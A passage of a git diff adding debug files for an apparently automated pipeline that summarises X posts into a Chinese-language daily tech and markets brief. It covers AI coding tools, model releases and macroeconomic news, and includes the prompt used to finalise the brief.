"https://x.com/jason/status/2049214864912978399"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-28T19:48:10+00:00", "title": "RT by @charliebilello: Tomorrow's News Today...\n\nBREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GROWTH AND INFLATION.", "url": "https://x.com/charliebilello/status/2049214106352107778"}] diff --git a/data/x_brief/debug/20260429_185943_l1_stage1_output.json b/data/x_brief/debug/20260429_185943_l1_stage1_output.json new file mode 100644 index 0000000..a5b5343 --- /dev/null +++ b/data/x_brief/debug/20260429_185943_l1_stage1_output.json @@ -0,0 +1,260 @@ +{ + "raw_text": "\n\n{\"headline\":\"AI编程工具爆发:Warp开源、Cursor 3.2携GPT-5.5登场,Claude接 Blender MCP 打通创意工作流\",\"trending_keywords\":[\"Warp开源\",\"Cursor 3.2\",\"GPT-5.5\",\"Claude Blender MCP\",\"Nemotron 3 Nano\",\"Matt Pocock Skills\"],\"themes\":[{\"id\":\"t1\",\"title\":\"AI编程工具军备竞赛升级\",\"subtitle\":\"Warp开源、Cursor 3.2、Claude Code三路夹击,开发者工作流正在被重新定义\",\"priority\":\"P0\",\"bullets\":[\"Warp昨晚开源:AGPL协议,38k+星,定位ADE,内置Agent支持Claude Code/Codex/Gemini CLI\",\"Cursor 3.2发布:GPT-5.5强势入驻(CursorBench 72.8%),/multitask并行任务支持,多仓库workspace\"],\"sample_urls\":[\"https://github.com/warpdotdev/warp\",\"https://x.com/cursor_ai/status/2047744579127185843\"]},{\"id\":\"t2\",\"title\":\"Claude打通创意工具链\",\"subtitle\":\"Blender MCP上线+9个创意连接器,AI从代码生成延伸到3D设计和创意工作流\",\"priority\":\"P1\",\"bullets\":[\"Claude上线Blender MCP连接器:自然语言直接操控Blender Python API,批量改物体/调场景无需写代码\",\"Anthropic同时加入Blender基金会当赞助商\",\"同日上线Adobe Creative Cloud、Ableton、Canva等9个创意工具连接器\"],\"sample_urls\":[\"https://x.com/Pluvio9yte/status/2049403423813140571\",\"https://x.com/berryxia/status/2049247904536428805\"]},{\"id\":\"t3\",\"title\":\"开源生态的冷数据:67,196个Agent项目分析\",\"subtitle\":\"Jason Zhu跑通全网Agent工具库,揭示极度不均衡的分布\",\"priority\":\"P1\",\"bullets\":[\"基尼系数0.983破纪录,54.1%项目0 star,Top1%占83% stars\",\"2026年3月单月新增27,720个项目,是2024年月均的45倍\",\"Matt Pocock开源Skill框架:16个工程师级实战技能,38K stars\"],\"sample_urls\":[\"https://x.com/GoSailGlobal/status/2049415194372342164\",\"https://x.com/GoSailGlobal/status/2049339826877665496\"]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"OpenAI全系正式登陆AWS\",\"meta\":\"2026-04-29 | 来自@GoSailGlobal\",\"summary\":\"GPT + Codex + 托管Agent一并上线AWS,企业级AI服务再下一城\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"p02\",\"title\":\"Nvidia发布Nemotron 3 Nano Omni\",\"meta\":\"2026-04-28 | 来自@berryxia\",\"summary\":\"30B参数多模态开源模型,256K上下文,专为subagents设计,完全开源\",\"url\":\"https://x.com/berryxia/status/2049253021159403786\"},{\"id\":\"p03\",\"title\":\"Anthropic拒接军方合作\",\"meta\":\"2026-04-29 | 来自@GoSailGlobal\",\"summary\":\"Google顺势签下五角大楼新合同,AI厂商在政府合同上分化\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"p04\",\"title\":\"Claude Code系统提示Bug\",\"meta\":\"2026-04-29 | 来自@GoSailGlobal\",\"summary\":\"托管Agent失效+用户token被空转烧光,需关注\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"p05\",\"title\":\"美联储维持利率3.50-3.75%\",\"meta\":\"2026-04-28 | 来自@charliebilello\",\"summary\":\"伊朗战争影响经济和通胀预期,利率决策观望\",\"url\":\"https://x.com/charliebilello/status/2049214106352107778\"},{\"id\":\"p06\",\"title\":\"Perplexity全面切换GPT-5.5\",\"meta\":\"2026-04-24 | 来自@AravSrinivas\",\"summary\":\"GPT-5.5作为默认orchestrator模型,性能和成本优化\",\"url\":\"https://x.com/AravSrinivas/status/2047753276888854595\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"feels like a good time to seriously rethink how operating systems and user interfaces are designed\",\"speaker\":\"Sam Altman\",\"date\":\"2026-04-26\",\"note\":\"对OS和UI设计的反思,暗示AI将改变人机交互范式\",\"url\":\"https://x.com/sama/status/2048428561481265539\"},{\"id\":\"q2\",\"quote\":\"Warp 不只是个终端,定位是 ADE(Agentic Development Environment)\",\"speaker\":\"泊舟\",\"date\":\"2026-04-29\",\"note\":\"Warp开源定位解读,AGPL防白嫖\",\"url\":\"https://x.com/bozhou_ai/status/2049436870963085429\"},{\"id\":\"q3\",\"quote\":\"The real issue is culture and talent quality, and fixing that usually requires a full rebuild\",\"speaker\":\"Harry Stebbings\",\"date\":\"2026-04-29\",\"note\":\"关于AI时代团队重建的洞见,裁员不能解决文化问题\",\"url\":\"https://x.com/HarryStebbings/status/2049298621951058341\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"开源工具爆发\",\"subtitle\":\"Warp开源+Matt Pocock Skills+Poolside Laguna\",\"level\":\"P0\",\"item_urls\":[\"https://github.com/warpdotdev/warp\",\"https://github.com/mattpocock/skills\",\"https://x.com/berryxia/status/2049250710492160228\"],\"item_texts\":[\"Warp开源38k+星,AGPL协议\",\"Matt Pocock Skills 38K stars\",\"前GitHub CTO团队Poolside开源Laguna\"]},{\"id\":\"c2\",\"title\":\"AI编程工具更新\",\"subtitle\":\"Cursor 3.2 + Claude Code + Codex\",\"level\":\"P0\",\"item_urls\":[\"https://x.com/cursor_ai/status/2047744579127185843\",\"https://x.com/GoSailGlobal/status/2049327989951967546\"],\"item_texts\":[\"Cursor 3.2: GPT-5.5入驻,/multitask并行\",\"Codex获Sam Altman点赞\\\"escape velocity\\\"\"]},{\"id\":\"c3\",\"title\":\"3D/创意工作流\",\"subtitle\":\"Claude Blender MCP + SATO网格生成\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/berryxia/status/2049247904536428805\",\"https://x.com/berryxia/status/2049255217603178794\"],\"item_texts\":[\"Claude接Blender等9个创意工具\",\"SATO: 3D网格生成重磅突破\"]},{\"id\":\"c4\",\"title\":\"大模型进展\",\"subtitle\":\"Nvidia Nemotron + MiniCPM-o 4.5\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/berryxia/status/2049253021159403786\",\"https://x.com/berryxia/status/2049274065610027362\"],\"item_texts\":[\"Nemotron 3 Nano 30B多模态开源\",\"MiniCPM-o 4.5: 边缘AI突破\"]},{\"id\":\"c5\",\"title\":\"宏观与能源\",\"subtitle\":\"伊朗战争对能源价格的影响\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/charliebilello/status/2049298490489004357\"],\"item_texts\":[\"Jet Fuel +70%, 原油+48-52%, 化肥+23%\"]},{\"id\":\"c6\",\"title\":\"华语圈热点\",\"subtitle\":\"小米送token、联通查PCDN\",\"level\":\"P2\",\"item_urls\":[\"https://x.com/realNyarime/status/2049296454905393361\",\"https://x.com/realNyarime/status/2049408651660755063\"],\"item_texts\":[\"小米百万亿token补贴\",\"长沙联通上门查PCDN\"]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"Claude Code系统提示Bug\",\"detail\":\"托管Agent失效+用户token被空转烧光,使用Claude Code需留意\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"Anthropic与军方合作分歧\",\"detail\":\"Anthropic拒接军方合作,Google签下五角大楼合同,AI厂商在政府合同上分化,可能影响未来市场格局\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"AI安全争议持续\",\"detail\":\"Gary Marcus持续质疑AI公司,OpenAI庭审中Musk与Altman矛盾公开化\",\"url\":\"https://x.com/GaryMarcus/status/2049243406380237116\"},{\"id\":\"r4\",\"level\":\"MID\",\"title\":\"美股估值与退出困境\",\"detail\":\"Harry Stebbings警示 VC支持的科技创新公司 IPO门槛高(需5亿收入),退出选项有限\",\"url\":\"https://x.com/HarryStebbings/status/2049237538901020767\"},{\"id\":\"r5\",\"level\":\"WARN\",\"title\":\"美国房价增速放缓\",\"detail\":\"全美房价同比仅增0.7%(2023年6月以来最慢),卖家数量创纪录 比买家多46%,若无政府干预价格将下行\",\"url\":\"https://x.com/charliebilello/status/2049306480071873011\"},{\"id\":\"r6\",\"level\":\"MID\",\"title\":\"开源bot的护城河危机\",\"detail\":\"Leo:AI时代护城河从\\\"代码会写\\\"变成\\\"策略会想\\\",以前两个月重写架构变成两小时\",\"url\":\"https://x.com/runes_leo/status/2049311708330459226\"}]}", + "parsed_draft": { + "headline": "AI编程工具爆发:Warp开源、Cursor 3.2携GPT-5.5登场,Claude接 Blender MCP 打通创意工作流", + "trending_keywords": [ + "Warp开源", + "Cursor 3.2", + "GPT-5.5", + "Claude Blender MCP", + "Nemotron 3 Nano", + "Matt Pocock Skills" + ], + "themes": [ + { + "id": "t1", + "title": "AI编程工具军备竞赛升级", + "subtitle": "Warp开源、Cursor 3.2、Claude Code三路夹击,开发者工作流正在被重新定义", + "priority": "P0", + "bullets": [ + "Warp昨晚开源:AGPL协议,38k+星,定位ADE,内置Agent支持Claude Code/Codex/Gemini CLI", + "Cursor 3.2发布:GPT-5.5强势入驻(CursorBench 72.8%),/multitask并行任务支持,多仓库workspace" + ], + "sample_urls": [ + "https://github.com/warpdotdev/warp", + "https://x.com/cursor_ai/status/2047744579127185843" + ] + }, + { + "id": "t2", + "title": "Claude打通创意工具链", + "subtitle": "Blender MCP上线+9个创意连接器,AI从代码生成延伸到3D设计和创意工作流", + "priority": "P1", + "bullets": [ + "Claude上线Blender MCP连接器:自然语言直接操控Blender Python API,批量改物体/调场景无需写代码", + "Anthropic同时加入Blender基金会当赞助商", + "同日上线Adobe Creative Cloud、Ableton、Canva等9个创意工具连接器" + ], + "sample_urls": [ + "https://x.com/Pluvio9yte/status/2049403423813140571", + "https://x.com/berryxia/status/2049247904536428805" + ] + }, + { + "id": "t3", + "title": "开源生态的冷数据:67,196个Agent项目分析", + "subtitle": "Jason Zhu跑通全网Agent工具库,揭示极度不均衡的分布", + "priority": "P1", + "bullets": [ + "基尼系数0.983破纪录,54.1%项目0 star,Top1%占83% stars", + "2026年3月单月新增27,720个项目,是2024年月均的45倍", + "Matt Pocock开源Skill框架:16个工程师级实战技能,38K stars" + ], + "sample_urls": [ + "https://x.com/GoSailGlobal/status/2049415194372342164", + "https://x.com/GoSailGlobal/status/2049339826877665496" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI全系正式登陆AWS", + "meta": "2026-04-29 | 来自@GoSailGlobal", + "summary": "GPT + Codex + 托管Agent一并上线AWS,企业级AI服务再下一城", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "p02", + "title": "Nvidia发布Nemotron 3 Nano Omni", + "meta": "2026-04-28 | 来自@berryxia", + "summary": "30B参数多模态开源模型,256K上下文,专为subagents设计,完全开源", + "url": "https://x.com/berryxia/status/2049253021159403786" + }, + { + "id": "p03", + "title": "Anthropic拒接军方合作", + "meta": "2026-04-29 | 来自@GoSailGlobal", + "summary": "Google顺势签下五角大楼新合同,AI厂商在政府合同上分化", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "p04", + "title": "Claude Code系统提示Bug", + "meta": "2026-04-29 | 来自@GoSailGlobal", + "summary": "托管Agent失效+用户token被空转烧光,需关注", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "p05", + "title": "美联储维持利率3.50-3.75%", + "meta": "2026-04-28 | 来自@charliebilello", + "summary": "伊朗战争影响经济和通胀预期,利率决策观望", + "url": "https://x.com/charliebilello/status/2049214106352107778" + }, + { + "id": "p06", + "title": "Perplexity全面切换GPT-5.5", + "meta": "2026-04-24 | 来自@AravSrinivas", + "summary": "GPT-5.5作为默认orchestrator模型,性能和成本优化", + "url": "https://x.com/AravSrinivas/status/2047753276888854595" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "feels like a good time to seriously rethink how operating systems and user interfaces are designed", + "speaker": "Sam Altman", + "date": "2026-04-26", + "note": "对OS和UI设计的反思,暗示AI将改变人机交互范式", + "url": "https://x.com/sama/status/2048428561481265539" + }, + { + "id": "q2", + "quote": "Warp 不只是个终端,定位是 ADE(Agentic Development Environment)", + "speaker": "泊舟", + "date": "2026-04-29", + "note": "Warp开源定位解读,AGPL防白嫖", + "url": "https://x.com/bozhou_ai/status/2049436870963085429" + }, + { + "id": "q3", + "quote": "The real issue is culture and talent quality, and fixing that usually requires a full rebuild", + "speaker": "Harry Stebbings", + "date": "2026-04-29", + "note": "关于AI时代团队重建的洞见,裁员不能解决文化问题", + "url": "https://x.com/HarryStebbings/status/2049298621951058341" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "开源工具爆发", + "subtitle": "Warp开源+Matt Pocock Skills+Poolside Laguna", + "level": "P0", + "item_urls": [ + "https://github.com/warpdotdev/warp", + "https://github.com/mattpocock/skills", + "https://x.com/berryxia/status/2049250710492160228" + ], + "item_texts": [ + "Warp开源38k+星,AGPL协议", + "Matt Pocock Skills 38K stars", + "前GitHub CTO团队Poolside开源Laguna" + ] + }, + { + "id": "c2", + "title": "AI编程工具更新", + "subtitle": "Cursor 3.2 + Claude Code + Codex", + "level": "P0", + "item_urls": [ + "https://x.com/cursor_ai/status/2047744579127185843", + "https://x.com/GoSailGlobal/status/2049327989951967546" + ], + "item_texts": [ + "Cursor 3.2: GPT-5.5入驻,/multitask并行", + "Codex获Sam Altman点赞\"escape velocity\"" + ] + }, + { + "id": "c3", + "title": "3D/创意工作流", + "subtitle": "Claude Blender MCP + SATO网格生成", + "level": "P1", + "item_urls": [ + "https://x.com/berryxia/status/2049247904536428805", + "https://x.com/berryxia/status/2049255217603178794" + ], + "item_texts": [ + "Claude接Blender等9个创意工具", + "SATO: 3D网格生成重磅突破" + ] + }, + { + "id": "c4", + "title": "大模型进展", + "subtitle": "Nvidia Nemotron + MiniCPM-o 4.5", + "level": "P1", + "item_urls": [ + "https://x.com/berryxia/status/2049253021159403786", + "https://x.com/berryxia/status/2049274065610027362" + ], + "item_texts": [ + "Nemotron 3 Nano 30B多模态开源", + "MiniCPM-o 4.5: 边缘AI突破" + ] + }, + { + "id": "c5", + "title": "宏观与能源", + "subtitle": "伊朗战争对能源价格的影响", + "level": "P1", + "item_urls": [ + "https://x.com/charliebilello/status/2049298490489004357" + ], + "item_texts": [ + "Jet Fuel +70%, 原油+48-52%, 化肥+23%" + ] + }, + { + "id": "c6", + "title": "华语圈热点", + "subtitle": "小米送token、联通查PCDN", + "level": "P2", + "item_urls": [ + "https://x.com/realNyarime/status/2049296454905393361", + "https://x.com/realNyarime/status/2049408651660755063" + ], + "item_texts": [ + "小米百万亿token补贴", + "长沙联通上门查PCDN" + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "Claude Code系统提示Bug", + "detail": "托管Agent失效+用户token被空转烧光,使用Claude Code需留意", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r2", + "level": "MID", + "title": "Anthropic与军方合作分歧", + "detail": "Anthropic拒接军方合作,Google签下五角大楼合同,AI厂商在政府合同上分化,可能影响未来市场格局", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI安全争议持续", + "detail": "Gary Marcus持续质疑AI公司,OpenAI庭审中Musk与Altman矛盾公开化", + "url": "https://x.com/GaryMarcus/status/2049243406380237116" + }, + { + "id": "r4", + "level": "MID", + "title": "美股估值与退出困境", + "detail": "Harry Stebbings警示 VC支持的科技创新公司 IPO门槛高(需5亿收入),退出选项有限", + "url": "https://x.com/HarryStebbings/status/2049237538901020767" + }, + { + "id": "r5", + "level": "WARN", + "title": "美国房价增速放缓", + "detail": "全美房价同比仅增0.7%(2023年6月以来最慢),卖家数量创纪录 比买家多46%,若无政府干预价格将下行", + "url": "https://x.com/charliebilello/status/2049306480071873011" + }, + { + "id": "r6", + "level": "MID", + "title": "开源bot的护城河危机", + "detail": "Leo:AI时代护城河从\"代码会写\"变成\"策略会想\",以前两个月重写架构变成两小时", + "url": "https://x.com/runes_leo/status/2049311708330459226" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_185943_l1_stage2_input.txt b/data/x_brief/debug/20260429_185943_l1_stage2_input.txt new file mode 100644 index 0000000..d2c85a2 --- /dev/null +++ b/data/x_brief/debug/20260429_185943_l1_stage2_input.txt @@ -0,0 +1,35 @@ +[meta] + +phase=stage2_finalize + +tweets=120 + + + +[prompt] + +你是“X资讯月报总编”。请基于阶段1草案,输出最终可渲染 JSON(阶段2定稿)。 + +要求: +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 必须严格使用最终字段: +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "trending_keywords":["关键词1","关键词2","关键词3"], + "themes":[{"id":"t1","title":"...","subtitle":"...","priority":"P0|P1|P2","bullets":["..."],"samples":[{"text":"...","url":"...","handle":"...","date":"..."}]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","items":[{"text":"...","url":"..."}]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 保证 JSON 合法(双引号、无尾逗号)。 +4) 引用 URL 时,优先从“推文索引”中取值;samples/items 尽量带 url。 +5) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +6) 严格保留 stage1 草案中每个 theme 的 priority 字段(P0/P1/P2)。 +7) 严格保留 stage1 草案中的 trending_keywords 数组。 + +阶段1草案(JSON): +{"headline": "AI编程工具爆发:Warp开源、Cursor 3.2携GPT-5.5登场,Claude接 Blender MCP 打通创意工作流", "trending_keywords": ["Warp开源", "Cursor 3.2", "GPT-5.5", "Claude Blender MCP", "Nemotron 3 Nano", "Matt Pocock Skills"], "themes": [{"id": "t1", "title": "AI编程工具军备竞赛升级", "subtitle": "Warp开源、Cursor 3.2、Claude Code三路夹击,开发者工作流正在被重新定义", "priority": "P0", "bullets": ["Warp昨晚开源:AGPL协议,38k+星,定位ADE,内置Agent支持Claude Code/Codex/Gemini CLI", "Cursor 3.2发布:GPT-5.5强势入驻(CursorBench 72.8%),/multitask并行任务支持,多仓库workspace"], "sample_urls": ["https://github.com/warpdotdev/warp", "https://x.com/cursor_ai/status/2047744579127185843"]}, {"id": "t2", "title": "Claude打通创意工具链", "subtitle": "Blender MCP上线+9个创意连接器,AI从代码生成延伸到3D设计和创意工作流", "priority": "P1", "bullets": ["Claude上线Blender MCP连接器:自然语言直接操控Blender Python API,批量改物体/调场景无需写代码", "Anthropic同时加入Blender基金会当赞助商", "同日上线Adobe Creative Cloud、Ableton、Canva等9个创意工具连接器"], "sample_urls": ["https://x.com/Pluvio9yte/status/2049403423813140571", "https://x.com/berryxia/status/2049247904536428805"]}, {"id": "t3", "title": "开源生态的冷数据:67,196个Agent项目分析", "subtitle": "Jason Zhu跑通全网Agent工具库,揭示极度不均衡的分布", "priority": "P1", "bullets": ["基尼系数0.983破纪录,54.1%项目0 star,Top1%占83% stars", "2026年3月单月新增27,720个项目,是2024年月均的45倍", "Matt Pocock开源Skill框架:16个工程师级实战技能,38K stars"], "sample_urls": ["https://x.com/GoSailGlobal/status/2049415194372342164", "https://x.com/GoSailGlobal/status/2049339826877665496"]}], "p0_events": [{"id": "p01", "title": "OpenAI全系正式登陆AWS", "meta": "2026-04-29 | 来自@GoSailGlobal", "summary": "GPT + Codex + 托管Agent一并上线AWS,企业级AI服务再下一城", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"id": "p02", "title": "Nvidia发布Nemotron 3 Nano Omni", "meta": "2026-04-28 | 来自@berryxia", "summary": "30B参数多模态开源模型,256K上下文,专为subagents设计,完全开源", "url": "https://x.com/berryxia/status/2049253021159403786"}, {"id": "p03", "title": "Anthropic拒接军方合作", "meta": "2026-04-29 | 来自@GoSailGlobal", "summary": "Google顺势签下五角大楼新合同,AI厂商在政府合同上分化", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"id": "p04", "title": "Claude Code系统提示Bug", "meta": "2026-04-29 | 来自@GoSailGlobal", "summary": "托管Agent失效+用户token被空转烧光,需关注", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"id": "p05", "title": "美联储维持利率3.50-3.75%", "meta": "2026-04-28 | 来自@charliebilello", "summary": "伊朗战争影响经济和通胀预期,利率决策观望", "url": "https://x.com/charliebilello/status/2049214106352107778"}, {"id": "p06", "title": "Perplexity全面切换GPT-5.5", "meta": "2026-04-24 | 来自@AravSrinivas", "summary": "GPT-5.5作为默认orchestrator模型,性能和成本优化", "url": "https://x.com/AravSrinivas/status/2047753276888854595"}], "top_quotes": [{"id": "q1", "quote": "feels like a good time to seriously rethink how operating systems and user interfaces are designed", "speaker": "Sam Altman", "date": "2026-04-26", "note": "对OS和UI设计的反思,暗示AI将改变人机交互范式", "url": "https://x.com/sama/status/2048428561481265539"}, {"id": "q2", "quote": "Warp 不只是个终端,定位是 ADE(Agentic Development Environment)", "speaker": "泊舟", "date": "2026-04-29", "note": "Warp开源定位解读,AGPL防白嫖", "url": "https://x.com/bozhou_ai/status/2049436870963085429"}, {"id": "q3", "quote": "The real issue is culture and talent quality, and fixing that usually requires a full rebuild", "speaker": "Harry Stebbings", "date": "2026-04-29", "note": "关于AI时代团队重建的洞见,裁员不能解决文化问题", "url": "https://x.com/HarryStebbings/status/2049298621951058341"}], "category_updates": [{"id": "c1", "title": "开源工具爆发", "subtitle": "Warp开源+Matt Pocock Skills+Poolside Laguna", "level": "P0", "item_urls": ["https://github.com/warpdotdev/warp", "https://github.com/mattpocock/skills", "https://x.com/berryxia/status/2049250710492160228"], "item_texts": ["Warp开源38k+星,AGPL协议", "Matt Pocock Skills 38K stars", "前GitHub CTO团队Poolside开源Laguna"]}, {"id": "c2", "title": "AI编程工具更新", "subtitle": "Cursor 3.2 + Claude Code + Codex", "level": "P0", "item_urls": ["https://x.com/cursor_ai/status/2047744579127185843", "https://x.com/GoSailGlobal/status/2049327989951967546"], "item_texts": ["Cursor 3.2: GPT-5.5入驻,/multitask并行", "Codex获Sam Altman点赞\"escape velocity\""]}, {"id": "c3", "title": "3D/创意工作流", "subtitle": "Claude Blender MCP + SATO网格生成", "level": "P1", "item_urls": ["https://x.com/berryxia/status/2049247904536428805", "https://x.com/berryxia/status/2049255217603178794"], "item_texts": ["Claude接Blender等9个创意工具", "SATO: 3D网格生成重磅突破"]}, {"id": "c4", "title": "大模型进展", "subtitle": "Nvidia Nemotron + MiniCPM-o 4.5", "level": "P1", "item_urls": ["https://x.com/berryxia/status/2049253021159403786", "https://x.com/berryxia/status/2049274065610027362"], "item_texts": ["Nemotron 3 Nano 30B多模态开源", "MiniCPM-o 4.5: 边缘AI突破"]}, {"id": "c5", "title": "宏观与能源", "subtitle": "伊朗战争对能源价格的影响", "level": "P1", "item_urls": ["https://x.com/charliebilello/status/2049298490489004357"], "item_texts": ["Jet Fuel +70%, 原油+48-52%, 化肥+23%"]}, {"id": "c6", "title": "华语圈热点", "subtitle": "小米送token、联通查PCDN", "level": "P2", "item_urls": ["https://x.com/realNyarime/status/2049296454905393361", "https://x.com/realNyarime/status/2049408651660755063"], "item_texts": ["小米百万亿token补贴", "长沙联通上门查PCDN"]}], "risk_signals": [{"id": "r1", "level": "HIGH", "title": "Claude Code系统提示Bug", "detail": "托管Agent失效+用户token被空转烧光,使用Claude Code需留意", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"id": "r2", "level": "MID", "title": "Anthropic与军方合作分歧", "detail": "Anthropic拒接军方合作,Google签下五角大楼合同,AI厂商在政府合同上分化,可能影响未来市场格局", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"id": "r3", "level": "OPP", "title": "AI安全争议持续", "detail": "Gary Marcus持续质疑AI公司,OpenAI庭审中Musk与Altman矛盾公开化", "url": "https://x.com/GaryMarcus/status/2049243406380237116"}, {"id": "r4", "level": "MID", "title": "美股估值与退出困境", "detail": "Harry Stebbings警示 VC支持的科技创新公司 IPO门槛高(需5亿收入),退出选项有限", "url": "https://x.com/HarryStebbings/status/2049237538901020767"}, {"id": "r5", "level": "WARN", "title": "美国房价增速放缓", "detail": "全美房价同比仅增0.7%(2023年6月以来最慢),卖家数量创纪录 比买家多46%,若无政府干预价格将下行", "url": "https://x.com/charliebilello/status/2049306480071873011"}, {"id": "r6", "level": "MID", "title": "开源bot的护城河危机", "detail": "Leo:AI时代护城河从\"代码会写\"变成\"策略会想\",以前两个月重写架构变成两小时", "url": "https://x.com/runes_leo/status/2049311708330459226"}]} + +推文索引(按 url 可回填 handle/date/text): +[{"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T10:38:03+00:00", "title": "Anthropic ships changelogs. OpenAI ships vibes.", "url": "https://x.com/runes_leo/status/2049438052310020226"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-04-29T10:33:21+00:00", "title": "Warp 昨晚开源了。\n\nGitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。\n\nWarp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。\n\n几个观察:\n\n第一,协议是 AGPL,不是 MIT。意思是个人爱怎么用怎么用,但你要拿去做云服务卖钱,整个改动都得开源。MongoDB、Redis 那条防白嫖的老路。\n\n第二", "url": "https://x.com/bozhou_ai/status/2049436870963085429"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-04-29T10:32:33+00:00", "title": "MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。\n\ncyrilXBT 整理的清单,分四类。\n\n【基础】\n\n1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法\nhttps://cs.nyu.edu/~mohri/mlbook/\n\n2. Mathematics for Machine Learning:ML 背后的线代、概率、微积分\nhttps://mml-book.github.io/\n\n3. Probabilistic Ma", "url": "https://x.com/bozhou_ai/status/2049436668663390575"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T09:40:13+00:00", "title": "Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。\n\n但通知再快也是要人读的。我并不想读。\n\n我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。\n\n懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / 这条系统自愈了别管 / 这条留到周日复盘。\n\n然后我只看结论那一行,拍板即可。\n\n工具厂都在卷\"通知到手机更快\",但没人卷\"替你读完\"。这才是 worker", "url": "https://x.com/runes_leo/status/2049423498494566836"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T09:38:53+00:00", "title": "这个动效设计 skills 真好!\n\nnpx skills add jakubantalik/transitions-dev", "url": "https://x.com/dingyi/status/2049423162933395583"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T09:35:28+00:00", "title": "国内自媒体真的赢麻了,随便说点deepseek V4 的好话就大几万播放,要是再加点黄仁勋彻底失败,美国AI走向灭亡,要是再懂点的,分析下中美能源对比,在喊一句华为取代英伟达成为全球霸主彻底改写世界AI格局,这视频直接奔着几十万播放去的。", "url": "https://x.com/CuiMao/status/2049422304338444773"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T09:13:21+00:00", "title": "R to @paulg: Why do I assume his successors will be more principled? Partly because almost everyone is, even in politics. And partly because if they aren't, it won't matter much who's president, because the country will have entered a phase of permanent decline.", "url": "https://x.com/paulg/status/2049416736806449649"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T09:11:10+00:00", "title": "R to @paulg: He'll leave the opposite legacy. His more principled successors will have a harder time getting things done, because of the walls everyone has built to protect against Trump's overreach.", "url": "https://x.com/paulg/status/2049416188568949159"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T09:09:13+00:00", "title": "Trump's bullying only works (and only temporarily at that) because he's taking advantage of the high-trust customs and relationships established by more principled predecessors.", "url": "https://x.com/paulg/status/2049415696694587729"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T09:07:13+00:00", "title": "做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来\n\n数据库现在 67,196 个项目\n\n跑了一遍分布分析,结果让我自己愣了 30 秒:\n\n- 基尼系数 0.983(破 AppStore、npm、YouTube 纪录)\n- 54.1% 的项目是 0 star——不是「少 star」,是 0\n- Top 1% 占走了 83% 的 stars\n- 2026 年 3 月单月新增 27,720 个项目,是 2024 月均的 45 倍\n\n写了一篇 1800 字英文长文讲完所有发现", "url": "https://x.com/GoSailGlobal/status/2049415194372342164"}, {"handle": "realNyarime", "name": "奶昔", "published_at": 